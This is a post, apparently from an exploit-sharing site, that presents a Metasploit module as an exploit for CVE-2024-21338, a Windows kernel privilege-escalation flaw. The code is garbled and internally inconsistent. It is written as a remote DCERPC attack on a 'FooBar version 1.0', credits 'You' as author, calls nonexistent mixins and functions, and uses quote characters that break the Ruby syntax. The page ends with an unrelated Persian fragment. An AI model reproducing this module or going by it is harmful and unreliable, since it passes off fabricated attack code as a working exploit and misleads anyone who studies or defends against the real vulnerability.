Microsoft Windows 10.0.17763.5458 Privilege Escalation

#############################################
# Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #
#
# This module requires Metasploit: https://metasploit.com/download
#
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# #
#############################################

require ‘msf/core’

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘CVE-2024-21338 Exploit’,
‘Description’ => ‘This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.’,
‘Author’ => ‘You’,
‘License’ => MSF_LICENSE,
‘References’ => [
[‘CVE’, ‘2024-21338’]])
)

register_options(
[
OptString.new(‘RHOST’, [true, ‘The target address’, ‘127.0.0.1’]),
OptPort.new(‘RPORT’, [true, ‘The target port’, 1234])
])
end

def check
connect

begin
impacket_artifact(dcerpc_binding(‘ncacn_ip_tcp’), ‘FooBar’)
rescue Rex::Post::Meterpreter::RequestError
return Exploit::CheckCode::Safe
end

Exploit::CheckCode::Appears
end

def exploit
connect

begin
impacket_artifact(
dcerpc_binding(‘ncacn_ip_tcp’),
‘FooBar’,
datastore[‘FooBarPayload’])
rescue Rex::Post::Meterpreter::RequestError
fail_with Failure::UnexpectedReply, ‘Unexpected response from impacket_artifact’
end

handler
disconnect
end
end

#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338

نوشته های مشابه